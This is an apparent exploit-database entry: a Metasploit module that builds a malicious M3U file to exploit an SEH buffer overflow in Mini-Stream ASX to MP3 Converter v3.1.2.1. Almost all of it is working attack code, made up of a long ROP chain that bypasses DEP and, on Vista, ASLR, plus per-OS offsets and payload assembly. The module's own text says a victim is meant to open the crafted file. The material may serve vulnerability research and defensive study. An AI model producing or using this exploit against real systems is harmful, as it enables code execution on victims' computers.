# Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit (Multiple OS, DEP and ASLR Bypass)
# Date: July 13, 2010
# Author: Node
# Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe
# Version: Mini-Stream Software ASX to MP3 Converter v3.1.2.1.2010.03.30 Evaluation
# Tested on: Windows Vista Ultimate SP1 Eng
# Windows Vista Ultimate SP2 Eng
# Windows XP Pro SP3 Eng
# Windows XP Pro SP2 Swe
# Windows XP Pro SP3 Swe
# Windows XP Home SP3 Swe
# CVE :
# Notes: This is a proof of concept that it is possible to write ROP exploits
# that are portable to different operating systems. This exploit is
# using the following variables:
#
# 1. "Offset": The offset to the SEH overwrite
# 2. "Offset2": The offset before the ROP code starts in the buffer
# 3. "K32Offset": The offset to the kernel32 pointer on the stack
# 4. "VPOffset": The offset to VirtualProtect() from the grabbed
# kernel32 address
# 5. "ASLR": Activates or deactivates the ASLR bypassing ROP code
#
# The K32Offset and VPOffset are negged hex-numbers, to evade the
# null-byte problem. In the first target, K32Offset is "0xfffebcac"
# which gets converted in the ROP code to 0x00014354 (82772), which is
# how much the saved ESP address needs to be subtracted, to point to
# the kernel32 address. VPOffset is how much the Kernel32 address
# needs to be subtracted, to point to the VirtualProtect() function.
# If "ASLR" is false, "VPOffset" will be treated as the direct,
# non-negged address to VirtualProtect() in Kernel32.dll.
# Code:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Mini-Stream Software ASX to MP3 Converter v3.1.2.1 SEH Buffer Overflow.',
'Description' => %q{
This module exploits a SEH-based buffer overflow in ASX to MP3 Converter
v.3.1.2.1. An attacker must send the file to victim, and the victim must open
the specially crafted M3U file. This exploit is written with ROP gadgets from
MSA2Mfilter03.dll and bypasses DEP on all systems including ASLR on Vista.
},
'License' => MSF_LICENSE,
'Author' => [ 'Node' ],
'Version' => '$Revision: 99999 $',
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP1 Eng x86',
{'Offset' => 43511,
'Offset2' => 16339,
'K32Offset' => 0xfffebcac,
'VPOffset' => 0xfffe4e9c,
'ASLR' => true } ],
[ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP2 Eng x86',
{'Offset' => 43511,
'Offset2' => 16339,
'K32Offset' => 0xfffebcac,
'VPOffset' => 0xfffe5bf0,
'ASLR' => true } ],
[ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Eng x86',
{'Offset' => 43484,
'Offset2' => 16312,
'VPOffset' => 0x7c801ad4,
'ASLR' => false } ],
[ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP2 Swe x86',
{'Offset' => 43476,
'Offset2' => 16304,
'VPOffset' => 0x7c801ad0,
'ASLR' => false } ],
[ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Swe x86',
{'Offset' => 43491,
'Offset2' => 16319,
'VPOffset' => 0x7c801ad4,
'ASLR' => false } ],
[ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Home SP3 Swe x86',
{'Offset' => 43476,
'Offset2' => 16304,
'VPOffset' => 0x7c801ad4,
'ASLR' => false } ]
],
'Privileged' => false,
'DisclosureDate' => '',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'asx2mp3.m3u']),
], self.class)
end
def exploit
rop = [0x1002F7B7].pack('V') # PUSH ESP # AND AL,0C # NEG EDX # NEG EAX # SBB EDX,0 # POP EBX # RETN 10
rop << [0x10023315].pack('V') # ADD ESP,20 # RETN
rop << "1111" # VirtualProtect() placeholder
rop << "2222" #return address placeholder
rop << "3333" #lpAddress placeholder
rop << "4444" #dwsize placeholder
rop << "5555" #flNewProtect placeholder
rop << [0x10066005].pack('V') # lpflOldProtect writable address
rop << "A" * 8
rop << "A" * 16 # because of RETN 10
rop << [0x1002991C].pack('V') # XOR EDX,EDX # RETN
rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop << "A" * 4
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << "A" * 16
if target['ASLR'] == true
rop << [0x1002A649].pack('V') # POP EAX # RETN
rop << [target['K32Offset']].pack('V')
rop << [0x1005B5DB].pack('V') # NEG EAX # RETN
rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
rop << "A" * 8
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN
rop << "A" * 8
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << [0x1002C86A].pack('V') # SUB EAX,ECX # RETN
rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
rop << "A" * 8
end
rop << [0x100115AA].pack('V') # POP EBX # RETN
rop << [0xffffffff].pack('V')
rop << [0x10014548].pack('V') # XOR EAX,EAX # RETN
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x10016C87].pack('V') # INC EAX # RETN
rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop << "A" * 4
rop << [0x1002A649].pack('V') # POP EAX # RETN
rop << "A" * 16
rop << [target['VPOffset']].pack('V')
if target['ASLR'] == true
rop << [0x1005B5DB].pack('V') # NEG EAX # RETN
rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
rop << "A" * 8
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP #POP EBX # RETN
rop << "A" * 8
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop << [0x1002C86A].pack('V') # SUB EAX,ECX # RETN
end
rop << [0x10019AA7].pack('V') # MOV DWORD PTR DS:[EDX],EAX # POP EDI # XOR EAX,EAX # POP EBP # ADD ESP,40 # RETN
rop << "A" * 8
rop << "A" * 64
rop << [0x1002A649].pack('V') # POP EAX # RETN
rop << [0xffff95c8].pack('V') # negged shellcode offset
rop << [0x1005B5DB].pack('V') # NEG EAX # RETN
rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
rop << "A" * 8
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x100130C4].pack('V') # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN
rop << "A" * 8
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << [0x1001451E].pack('V') # ADD EAX,ECX # RETN
rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
rop << "A" * 8
rop << [0x100115AA].pack('V') # POP EBX # RETN
rop << [0xffffffff].pack('V')
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x10016C87].pack('V') # INC EAX # RETN
rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop << "A" * 4
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << "A" * 16
rop << [0x10027F59].pack('V') # MOV EAX,DWORD PTR DS:[EAX] # RETN
rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
rop << "A" * 8
rop << [0x100115AA].pack('V') # POP EBX # RETN
rop << [0xffffffff].pack('V')
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x10016C87].pack('V') # INC EAX # RETN
rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop << "A" * 4
rop << [0x1002A649].pack('V') # POP EAX # RETN
rop << "A" * 16
rop << [0xfffffc18].pack('V') # 0x3e8(1000].pack('V') negged
rop << [0x1005B5DB].pack('V') # NEG EAX # RETN
rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
rop << "A" * 8
rop << [0x100115AA].pack('V') # POP EBX # RETN
rop << [0xffffffff].pack('V')
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x10016C87].pack('V') # INC EAX # RETN
rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop << "A" * 4
rop << [0x1002A649].pack('V') # POP EAX # RETN
rop << "A" * 16
rop << [0xffffffc0].pack('V') # 0x40 negged
rop << [0x1005B5DB].pack('V') # NEG EAX # RETN
rop << [0x100163CA].pack('V') # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
rop << "A" * 8
rop << [0x100115AA].pack('V') # POP EBX # RETN
rop << [0xffffffff].pack('V')
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x100192DC].pack('V') # ADD EAX,4 # RETN
rop << [0x10016C87].pack('V') # INC EAX # RETN
rop << [0x10016C87].pack('V') # INC EAX # RETN
rop << [0x10016C87].pack('V') # INC EAX # RETN
rop << [0x1005B5DB].pack('V') # NEG EAX # RETN
rop << [0x1002D327].pack('V') # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
rop << [0x10029F3E].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop << "A" * 4
rop << [0x1002FA6A].pack('V') # MOV EAX,EDX # RETN
rop << "A" * 16
rop << [0x1002FE81].pack('V') # XCHG EAX,ESP # RETN
junk = rand_text_alpha_upper(target['Offset2']) #needed because of ADD ESP,4404 # RETN
junktoseh = rand_text_alpha_upper(target['Offset'] - junk.length - rop.length)
seh = [0x100177EA].pack('V') #ADD ESP,4404 # RETN
nops = "\x90" * 24
shellspace = rand_text_alpha_upper(1000 - payload.encoded.length)
m3ufile = junk + rop + junktoseh + seh + nops + payload.encoded + shellspace
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(m3ufile)
end
end
